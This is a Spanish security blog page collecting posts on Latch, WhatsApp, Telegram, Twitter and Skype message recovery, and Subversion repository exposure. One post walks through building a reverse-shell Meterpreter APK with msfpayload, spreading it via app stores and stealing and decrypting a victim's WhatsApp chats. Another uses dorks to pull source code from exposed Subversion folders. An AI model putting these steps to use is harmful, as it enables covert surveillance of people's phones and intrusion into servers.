Mostrando entradas con la etiqueta Recover Messages. Mostrar todas las entradas
Mostrando entradas con la etiqueta Recover Messages. Mostrar todas las entradas

miércoles, mayo 21, 2014

Cómo comenzar a utilizar Latch en tu vida digital desde hoy

Si has escuchado mucho sobre Latch y has pensado en probarlo alguna vez, este artículo te ayudará a comenzar de la forma más sencilla posible, ya que te permitirá jugar con la tecnología de una forma rápida. Además, te voy a dejar algunas recomendaciones de uso, así que vamos a ello, paso a paso.

Paso 1: Necesitas descargar la app de Latch a tu smartphone

Para ser usuario de Latch lo primero que necesitas es descargar la app de Latch para Windows Phone, Android o iPhone y desde la misma app podrás registrar un cuenta de usuario de Latch y activarla. Así que, como paso inicial, descarga la app. En la siguiente URL tienes los enlaces de descarga de los markets.

Figura 1: Enlaces a las descargas de Latch para Android, iPhone y Windows Phone

Paso 2: Necesitas un correo electrónico anónimo

Para manejar los pestillos se utiliza una cuenta de correo electrónico. Para protegerte al máximo, esa cuenta debe ser anónima, es decir, no debe contener ningún dato personal tuyo. Yo te recomiendo alguna cuenta que pertenezca a un dominio que tu gestiones directamente o que uses Gmail o Hotmail. Usar Gmail o Hotmail tienen la ventaja de que puedes añadir un 2FA basado en SMS o Google Authenticator para evitar que te puedan robar alguna vez la cuenta de correo anónimo que gestiona tu Latch.

Figura 2: Verificación en dos pasos con Google Authenticator en Gmail

Si alguna vez pasara que te robasen la cuenta que gestiona tu Latch, no te preocupes, nadie podrá acceder a tus cuentas protegidas por Latch y solo deberás hablar con los proveedores de tus identidades para que borren los Latches creados después de verificar que tú eres tú. 

Paso 3: Registra tu cuenta de Latch

Cuando ya tengas la app de Latch en tu smartphone y la cuenta de correo creada, lo que debes hacer es abrir la app de Latch y desde la pantalla de inicio deslizar hacia donde dice "Descubre Latch". Esto te llevará a cuatro pantallas que explican el proceso de pareado de cuentas. En la última de ellas, tendrás la opción de comenzar el Proceso de Registro.

Figura 3: Descubre Latch y pantalla de registro

Cuando comienza el proceso de registro, solo se te va a abrir un formulario con los campos que se pueden ver en la Figura 4. No se pide ningún dato personal, todo es totalmente anónimo. Solo necesitas introducir la cuenta de correo, el nombre con el que quieres que te comuniquemos. Yo he elegido Pato Donald, que siempre me ha gustado, y la contraseña que quieras usar.

Figura 4: Registro de la cuenta de Latch

Paso 4: Activa tu cuenta de Latch

Cuando des al botón de Registrarme, se enviará un correo electrónico de confirmación al buzón de tu correo electrónico. En él, viene un enlace de desafío con un token único para completar el proceso de registro.

Figura 5: Correo electrónico para activar la cuenta de Latch

Si te falla porque tu cliente de correo ha cortado el hipervínculo, en el mensaje tienes las instrucciones para manualmente crear el enlace de confirmación adecuado. Cuando hagas clic, ya podrás comenzar a usar Latch con tu cuenta. El siguiente vídeo te muestra cómo puedes utilizar Latch con Nevele Bank.


Figura 6: Demostración de todas las funciones de Latch en Nevele Bank

Paso 5: Pareando tus primeras cuentas

A día de hoy hay integradas más de 1.200 aplicaciones integradas en Latch. Por la arquitectura del sistema, muchas de ellas no sabemos qué son o dónde están, ya que son integraciones propias de servicios o sitios integrados con alguno de los plugins disponibles para los frameworks de Internet.

Figura 7: Estadísticas de apps integradas en Latch

Sin embargo, te puedes sacar una cuenta de los siguientes sitios en Internet y proteger la identidad con Latch. Esta es una lista corta para que empieces a probar:
- Canal cliente de Movistar en España: Guía de instalación de Latch
- Canal cliente de Movistar en Uruguay: Igual que canal cliente de España
- Universidad de Salamanca: Entorno de Single Sing-ON con Latch
- Cuenta de Tuenti: Manual de Latch en Tuenti y HTTPs
- Cuenta de Shodan con Latch
- Cuenta de 0xWord: Tiene implementado OTP opcional
- Cuenta de Nevele Bank: Implemetado Latch con operaciones y OTP opt-in
- Cuenta de eGarante con Latch
- Cuenta de RecoverMessages con Latch
- Panel de Control de Acens con Latch
En cuanto vayan acabando las implementaciones de sitios grandes que tenemos en curso, os iré informando de ello. Si queréis implementarlo en vuestro sitio, poneros en contacto con Eleven Paths y si queréis que se implemente en algún sitio, pasadnos la información para explorar las posibilidades.

Saludos Malignos!

lunes, abril 21, 2014

Robar WhatsApp de Android con Meterpreter de Metasploit

Facebook ha comprado WhatsApp y con ello todo lo bueno y malo que tiene esta aplicación. Lo bueno es algo sencillo de entender y es que tener más de 500 millones de usuarios es algo importante para la firma, pero también se lleva todos los problemas de seguridad que desde hace años van arrastrando a golpe de parche, aunque siguen apareciendo nuevos fallos en el cifrado y fugas de información que dejan ver tú número de teléfono, la ubicación donde estás o la dirección IP desde la que estás conectado. Además, hace algunas semanas se ha golpeado con mucha fuerza la aplicación de mensajería instantánea.

Sabemos que existen muchos métodos para espiar WhatsApp, aunque semanas atrás salió a la luz el método con el que WhatsApp para Android cifra y descifra las bases de datos de la aplicación. Conseguir estas bases de datos en Android es sencillo, ya que se almacenan en la SDCard del dispositivo, pero también pueden sacarse de un dispositivo iPhone si se tiene acceso local o al backup, aunque el proceso podría complicarse un poco, en función de si hay jailbreak o no, si hay SSH por defecto, y del tipo de dispositivo que sea y la versión del sistema iOS. Siempre podríamos intentar encontrar una vía realizando un hacking a dispositivos iPhone completo.

Alejandro Ramos (@aramosf) liberó un script en Python dónde teniendo la base de datos cifrada y el usuario de Gmail utilizado en el dispositivo Android se puede obtener las conversaciones descifradas y listas para su lectura. Además, el servicio Recover Messages ya dispone de esta funcionalidad para la recuperación de mensajes recuperados de una base de datos cifrada.

Figura 1: Script de descifrado de bases de datos Crypt5 de WhatsApp

¿Cómo funciona el cifrado y el descifrado? El algoritmo para cifrar es aes-cbc-192, la información de la base de datos es cifrada utilizando una clave y el nombre de la cuenta de correo electrónico del dispositivo. El modo cbc, cipher block chaining, aplica a cada bloque de texto plano un XOR con el bloque anteriormente cifrado, para su posterior cifrado. De este modo cada bloque de texto cifrado va a depender de todo lo que está en plano procesado hasta el momento. El vector de inicialización hace que cada mensaje sea único.

PoC: El llamado Wonderland

En algunos ámbitos Meterpreter, una famosa shellcode utilizada por muchos pentesters en el maravilloso framework de explotación Metasploit, es conocido como Wonderland, ya que proporciona al usuario todas las características en la toma de control de un dispositivo remoto, y lo que haremos será jugar con él y ver qué cosas, entre otras muchas, podemos hacer. Algunas de las cosas interesantes que podemos hacer con esta shellcode en un dispositivo móvil es robar la base de datos de WhatsApp, y después descifrarla.

Lo primero es conseguir ejecutar Meterpreter en un dispositivo Android. Esto puede ser tarea no sencilla, pero con un poco de imaginación se nos pueden ocurrir muchas vías. ¿Por qué no entrar por la puerta principal? Sí, podemos intentar entrar por Google Play, ¿En serio?

En esta vida todo es probar, y como ya ha explicado Sergio de los Santos hay un ecosistema de Malware y Fake Apps en Google Play lo suficientemente grande como para que se note mucho que hemos metido un Meterpreter. Además, hemos visto que hay peleas por hacer fakes app de WhatsApp, que hay quién se ha dado de alta como Apple Inc, los que se dedican a hacer estafas de SMS Premium como la de la Linterna Molona y cibercriminales que roban el WhatsApp directamente con supuestos juegos. ¡Manos a la obra!

Figura 2: Fakes App de un supuesto Apple Inc en Google Play

La primera vía sería utilizar la herramienta msfpayload para generar un APK instalable en los dispositivos Android, pero este APK no podrá ser subido a Google Play por diversos motivos, entre ellos que no está firmado por el desarrollador. Para la toma de contacto es totalmente válido, por lo que os dejo aquí como hacer un APK para Android que ejecute una Meterpreter inversa:
msfpayload android/meterpreter/reverse_tcp LHOST=[dirección IP a la que se conecta la shellcode] LPORT=[puerto a la que se conecta] R > nombre_fichero.apk
Figura 2: Creando una APK con un Meterpreter

La otra vía sería desarrollar una APK que pida órdenes, por ejemplo, mediante un XML y que al recibir una instrucción maliciosa en ese XML se conecte a un servidor dónde le esperaremos para otorgarle un JAR, dónde empaquetado se encuentre la shellcode de Meterpreter. Este JAR se puede ejecutar dentro del provider de la app que la víctima descarga del Google Play. ¿En serio? Sigamos adelante…

Ahora una vez que tenemos de alguna de las dos formas preparadas la APK maliciosa, preparamos el servidor que recibirá la conexión y que debe devolver el JAR con la shellcode. Para ello utilizamos la herramienta del framework de Metasploit denominada msfconsole, tal y como se puede ver en la imagen.

Figura 4: Usando msfconsole de Metasploit desde un Kali Linux

Tras ejecutar la instrucción exploit en este módulo el servicio queda habilitado por lo que al recibir una conexión externa le devolveremos el JAR que completará la segunda stage de la ejecución de la shell Meterpreter.

En la siguiente imagen podéis visualizar como el servicio queda a la espera, y cuando recibe la conexión se envía el fichero y después se toma el control del dispositivo móvil. Recordad que lo interesante es que la APK sea distribuida a través de un market, y si es oficial el desastre sería mayor.

Figura 5: Stage 2. Se devuelve el JAR con la shell Meterpreter

Ahora podemos realizar diversas acciones con esta shellcode Meterpreter dentro del dispositivo. Sin ser root se puede, siempre y cuando la APK que ha conseguido colar la shellcode tenga permisos para ello, realizar fotografías y obtenerlas en remoto, capturar sonido con el micrófono, incluso abrir un streaming entre el dispositivo y el atacante para ver en tiempo, casi, real lo que está sucediendo.

Si abrimos una shell del sistema y navegamos por la estructura de carpetas, solo accederemos a sitios dónde la app pueda, ya que no somos root. La SDCard es uno de los puntos donde podemos aprovecharnos de no ser root y encontrar información muy interesante.

Figura 6: Ejecutando comandos en el sistema

Al ejecutar un ls podemos encontrar la carpeta de WhatsApp y todo lo que hay dentro de la SDCard, es como un pequeño gran bazar chino dónde podemos coger lo que queramos a un coste cero. Al meternos dentro de la carpeta de WhatsApp, ahora mismo estamos en la ruta /sdcard/WhatsApp podemos encontrar los siguientes elementos: backups, databases, media y profile pictures.

Todas las imágenes, vídeos y audios que la víctima haya intercambiado, enviados por él o recibidos, están accesibles y sin cifrar, por lo que ya nuestra shellcode podría descargarlo a nuestro equipo.

Figura 7: El contenido transmitido por WhatsApp

En la imagen se ve /storage/sdcard0/… por el tema de los enlaces, pero en este ejemplo nos da igual referirnos como /sdcard. Dicho esto, ¿Cómo descargamos una imagen directamente? Meterpreter proporciona un comando para realizar descargas de archivos, este comando es download, y su sintaxis es download [origen] [destino].

En la siguiente imagen se puede visualizar un ejemplo de cómo llevar a cabo esta instrucción y poder obtener todas las imágenes, vídeos y audios que se encuentran en la SDCard.

Figura 8: Descargando las imágenes enviadas por WhatsApp
Para llevar a cabo la operativa con las bases de datos con los mensajes de WhatsApp es exactamente igual, solo que la instrucción en este caso sería download /sdcard/WhatsApp/Databases/[nombre base de datos][destino máquina local].

Figura 9: Las bases de datos de WhatsApp en Android cifradas con crypt5

Ahora nos queda, una vez que hemos descargado la base de datos, utilizar el script que comentábamos al principio para descifrar la base de datos crypt5. El script lo debemos ejecutar como viene en la imagen, y solo necesitamos la cuenta de correo que está dada de alta en el dispositivo.

Figura 10: Descifrando la base de datos crypt5 de WhatsApp

Ahora que tenemos la base de datos descifrada podemos utilizar aplicaciones que abran formatos SQLite3, por ejemplo el add-on de Mozilla Firefox denominado SQLite Manager si queremos hacerlo rápido. La segunda columna nos da el teléfono con el que se interactúo en el mensaje, y en la columna de data va el mensaje que se envió. Hay más columnas interesantes, ya que no todo son mensajes de texto, en otras se especifican si se envió datos como imágenes, y el recurso en el que se encuentra, audios, vídeos, etcétera.

Figura 11: La base de datos SQLite de WhatsApp vista en SQLite Manager

Además, una vez que tienes los mensajes, el siguiente paso sería recuperar los mensajes que hayan sido eliminados del WhatsApp. Hay que tener en cuenta que no solo se recuperarán los mensajes de texto sino que también podrán recuperarse las miniaturas de las imágenes transmitidas, incluidas las de los vídeos y los mensajes de geo-localización, tal y como se explica en el artículo de Recuperar mensajes de WhatsApp borrados.

Autor: Pablo González 
Twitter: @PabloGonzalezPe

martes, febrero 11, 2014

Telegram: Evitar que se borren los mensajes remotamente

Últimamente la app Telegram para el envío de mensajes está generando mucho revuelo. El uso de algunas características de cifrado end-to-end al estilo de TextSecure, sumado a la posibilidad de borrar los mensajes enviados al estilo de los Direct Messages de Twitter, además de poder poner un temporizador de vida a los mensajes enviados al estilo de SnapChat, sumado a todos los problemas de seguridad históricos que se han utilizado para espiar WhatsApp, han hecho que la app esté calando entre la gente.

Nosotros queríamos probar algunos trucos de hacking iOS: iPhone & iPad con esta app en su versión para iPhone, así que aplicamos la misma filosofía que tenemos en Recover Messages aplicada en WhatsApp Anti-Delete Protection Tool, Twitter Anti-Delete Protection Tool y Skype Anti-Delete Protection Tool, es decir, crear una especie "papelera" de reciclaje que evitase que los mensajes se puedan borrar remotamente.
Figura 1: Telegram Anti-Delete Protection Tool

Para ello, hay que bajarse la herramienta Telegram Anti-Delete Protection Tool, y conectar al sistema operativo - de momento solo es para Windows - el terminal iPhone con la app de Telegram que se quiere proteger para evitar que se borren los mensajes y dar al botón de Protect. No es necesario que se haya hecho ningún jailbreak al terminal ni nada parecido para hacer esto.

Figura 2: Una conversación en Telegram

Una vez que se ha podido proteger Telegram, en la app hay dos pestaña que permiten ver los mensajes que están almacenados en la base de datos SQLite y los que han sido borrados y están almacenados en la papelera de reciclaje de Telegram. En la Figura 2 se ve una conversación en la que no se ha borrado ningún mensaje y así se muestra en Telegram Anti-Delete Protection Tool cuando el terminal está conectado.

Figura 3: Todos los mensajes aparecen en la app sin haber sido borrados

Después, si el mensaje es eliminado en algún momento, este desaparecerá la app en los terminales que participen en esta conversación. Hacer esto es tan sencillo como seleccionar el mensaje y hacer clic en la opción de Delete.

Figura 4: Borrando un mensaje en el chat de Telegram

A partir de ese momento, ninguno de los dos tendrá el mensaje en su historial de conversación, y el mensaje aparecerá eliminado.

Figura 5: El mensaje ha sido eliminado y el chat sigue funcionando

La próxima vez que se conecte el terminal iPhone al equipo en el que está instalada la herramienta de Telegram Anti-Delete Protection Tool aparecerán todos los mensajes menos el que se acaba de eliminar.

Figura 6: Después de borrarse el mensaje, no aparece en la base de datos de chats

Sin embargo, el mensaje eliminado no se ha perdido del dispositivo, y estará almacenado en la papelera de reciclaje de Telegram que crea Telegram Anti-Delete Protection Tool, por lo que siempre se podrá acceder a estos mensajes.

Figura 7: ... pero aparece en la "papelera" de reciclaje de Telegram que crea la herramienta.

Al final, si hay acceso y control del terminal, parece lógico que se puedan controlar siempre los mensajes que se reciben, incluso si tienen un tiempo de vida o van cifrados end-to-end. De momento esta versión evita que se borren remotamente los mensajes - y desde la app de Telegram localmente -, con lo que se acaba con una de las funciones de privacidad que ofrece Telegram, pero seguiremos viendo en detalle cómo funcionan los distintos modos de chat que ofrece. 

Saludos Malignos!

domingo, febrero 02, 2014

Evitar que te borren los Mensajes Directos en Twitter

A veces te mandan cosas interesantes usando los Mensajes Directos o DM (Direct Messages) por Twitter que quieres conservar, pero cuando la persona que ha enviado los mensajes decide borrarlos, estos desaparecen para siempre de tu bandeja de mensajes. Esto es porque los los DM son únicos y si uno los borra, desaparecen para los dos.... y se pueden perder cosas muy interesantes.

Con la idea de evitar de evitar que los borren y pierdas algo que te interesa, dentro del proyecto de Recover Messages - el servicio para recuperar mensajes de WhtasApp borrados - se creó Twitter Anti-Delete Protection Tool para iPhone. La idea es similar a la que se usa en WhatsApp Anti-Delete Protection Tool o Skype Anti-Delete Protection Tool es decir, SIN necesidad de hacer Jailbreak al terminal iPhone, se conecta al equipo y se protege la app de Twitter.

Figura 1: Twitter Anti-Delete Protection Tool para iPhone

A partir de ese momento se crea una papelera de reciclaje de la app que hace que cada vez que se borre un mensaje DM, se copie a dicha papelera. Por lo que si alguien nos borra remotamente los DM, estos quedarán almacenados en la papelera y bastará con conectar el terminal al equipo y usar Twitter Anti-Delete Protection Tool otra vez para recuperar los mensajes que se han borrado de la bandeja de entrada de mensajes.

Saludos Malignos!

martes, diciembre 24, 2013

Latch está integrado en Recover Messages

Actualmente Recover Messages, el servicio en cloud de recuperación de mensajes borrados de WhatsApp, se encuentra integrado con Latch. A partir de ahora, cualquier usuario podrá añadir una protección extra a los ficheros de WhatsApp que suba y esté analizando, protegiendo con un Latch el acceso a su cuenta del servicio.

Figura 1: Latch en el perfil de usuario de Recover Messages

Para configurarlo basta con ir a la zona de Account y seleccionar el botón de Latch para que aparezca el lugar donde se introduce el Token Temporal de Pareado. El resto, es ir a la app de Latch para iPhone o para Android, solicitar un Token Temporal de Pareado en la app y ponerlo ahí.

Figura 2: Cuenta de Recover Messages en la app de Latch para iPhone 


Cuando la app esté pareada se podrá restringir el acceso a la cuenta e incluso configurar un modo nocturno o un acceso controlado por OTP seleccionando que la cuenta esté Unlock pero con OTP. El funcionamiento del sistema está descrito en el artículo de "Latch: Cómo proteger las identidades digitales".

Figura 3: Configuración de Latch en un servidor FTP con comandos Site

En el caso de Recover Messages la integración se ha hecho con el SDK de Latch para .NET que puedes encontrar y utilizar de forma gratuita desde el área de developer de Latch. Allí hay SDKs para .NET, Java, PHP, Python, Ruby o C. Algo similar a lo que hemos hecho en Recover Messages hizo Alejandro Ramos "dab" (@aramosf) en Security By Default para integrar Latch en un servidor FTP haciendo las conexiones con unos sencillos scripts en Bash.

Figura 4: Area developer de Latch que da acceso a SDKs y Plugins

Si quieres probar estas navidades Latch a nivel de usuario puedes hacerlo también con 0xWord siguiente este tutorial, con Nevele Bank o animarte y proteger tu cuenta de Acens. Actualmente hay más de 100 sitios ya conectados con Latch, y tu puedes conectar tu sitio web si tienes un WordPress, un Joomla, un Drupal, un DotNetNuke o un PrestaShop con unos cuantos clics.

Saludos Malignos!

lunes, septiembre 09, 2013

Recuperar mensajes borrados en Skype

Hace no demasiado he leído el artículo en DragonJar sobre cómo realizar un análisis forense a una aplicación Skype utilizando una pequeña utilidad llamada Skype Forensic. Este programa busca los ficheros de la aplicación en un equipo y los analiza para sacar las conversaciones y los contactos que allí han tenido lugar.

Figura 1: Skype Forensic

La mayoría de los datos que almacena Skype son guardados en bases de datos SQLite, con lo que es posible verlos manualmente con cualquier visor aunque esta herramienta simplifica un poco esta tarea y saca, por ejemplo, todas las conversaciones que han tenido lugar.

Figura 2: Tabla Chats de la Base de datos main.db de Skype 

La gracia de Skype es que al ser un SQLite, aunque se borren los mensajes de la tabla que los almacena, estos quedan en páginas borradas de la base de datos, por lo que un análisis a bajo nivel podría recuperar la información que allí se encuentra.

Figura 3: Borrado de un mensaje de Skype en una conversación en OS X

En la base de datos principal de cada cuenta de Skype del sistema, que se encuentra dentro de una carpeta con el nombre de usuario, hay una base de datos SQLite llamada main.db. Dentro de esta base de datos - extraíble desde un terminal AndroidiPhone, un Mac OS X o un sistema Windows, hay una tabla llamada Conversations que mantiene los hilos de las conversaciones y otra llamada Chats, donde se almacenan los mensajes enviados.

Estos mensajes pueden ser borrados, y dentro de la app se verá que el mensaje ha sido borrado porque en el hilo aparecen saltos en los mensajes, pero utilizando una recuperador de páginas perdidas en SQLite es posible sacarlo.

Figura 4: Visualización de mensaje borrado en Skype

Esta tarea es posible hacerla con Recover Messages, ya que no solo vale para reccuperar los mensajes borrados de WhatsApp, SMS o Line, y al igual que ya vimos que se podía hacer para sacar los ficheros borrados de la base de datos wc.db de Subversion, se puede utilizar para sacar las conversaciones borradas de Skype.

El funcionamiento es sencillo, se sube el fichero, se analiza, y en Raw Data se podrán ver los datos recuperados en bruto.

Figura 5: Raw Recovered data de una base de datos de Skype en Recover Messages

Si se analiza el fichero completo, se puede descargar un fichero con todos los datos recuperados, dónde se podrán ver las conversaciones borradas por el usuario en Skype aunque no aparezcan en la visualización del la base de datos con un visor SQLite.

Figura 6: Un ejemplo de una base de datos de Skype analizada con Recover Messages

Si algún día te topas con un análisis forense de Skype, ten presente que no basta con analizar sólo la base de datos, y que haciendo una inspección a bajo nivel tal vez sea posible sacar más información de la que se ve a simple vista.

Saludos Malignos!

martes, abril 16, 2013

Subversion: wc.db & pristine

Los riesgos de los repositorios de código de Subversion en los sitios web públicos ya los hemos comentado muchas veces. El ejemplo de Apple que se dejó un .svn/Entries y que mediante el SVN/Extractor de FOCA nos permitió llegar a una shell es uno de los casos más claros, pero esto puede ser mucho peor, ya que también tenemos la base de datos wc.db y el directorio pristine

wc.db

Esta es la base de datos de subversion y en ella se puede encontrar información de todos los ficheros que se han subido, incluso cuando el fichero .svn/entries esté vacío, algo que puede ser habitual. Encontrar estas bases de datos es tan sencillo, como encontrar el fichero .svn/entries con FOCA o hacer un poco de hacking con buscadores para hacer unas pruebas. En este caso un sencillo dork en Bing.

Figura 1: Buscando bases de datos de subversion en Bing

Una vez te descargas las base de datos se puede ver que es un SQLite, así que lo primero que puedes probar es a abrirla con un SQLite Browser o similar. En mi caso, el resultado es que la base de datos aparece vacía, aún cuando tiene más de 400 Kb de tamaño.

Figura 2: Base de datos vacía al analizarla con SQLite Browser

Por supuesto, ya que tenemos Recover Messages que hace análisis forense de todos los archivos SQLite, la subí y la analicé, apliqué una licencia y me descargué el fichero txt con el Raw Data Recovered y lo abrí con un editor de texto.

Figura 3: Analizando la base de datos de Subversion con Recover Messages

Como se puede ver en el editor de texto, aparecen los nombres de los archivos que se encuentran en el servidor, así que nada, como si tuviéramos el .svn/entries completo.

Figura 4: El volcado forense del fichero SQLite hecho con Recover Messages

Y basta con pedir el fichero a la URL a la ubicación concreta para acceder a él, tal y como se puede ver en la imagen.

Figura 5: El fichero está en su sitio

Pristine

Si lo de arriba te ha parecido chulo, espera a lo siguiente. Resulta que subversion guarda una copia de los archivos originales que se suben al servidor en una carpeta llamada pristine. La gracia es que allí el nombre de los archivos se ofusca en sha1, con una extensión .svn-base, lo que hace que no se le apliquen los tipos MIME asociados.

Figura 6: Estructura del nombre de los ficheros en el directorio pristine

Es decir, que un archivo .php está almacenado como un archivo .svn-base en la carpeta pristine y por lo tanto puede ser descargado. Para hacer eso, existe el programa svnpristine, al que solo hay que pasarle la ruta del servidor donde se encuentra la raiz de subversion, y se volcará toda la carpeta pristine a local.

Figura 7: Volcado de pristine con svnpristine

Con lo que si con el fichero .svn/entries se pueden hacer muchas cosas, con wc.db y pristine, las auditorías de seguridad pueden quedar vistas para sentencia con solo encontrar el subversion.

Saludos Malignos!

Entrada destacada

Hacking IA: Jailbreak, Prompt Injection, Hallucinations & Unalignment. Nuestro nuevo libro en 0xWord

Pocas veces me ha hecho tanta ilusión que saliera un nuevo libro en 0xWord como con este libro de " Hacking IA: Jailbreak, Prompt Inje...

Entradas populares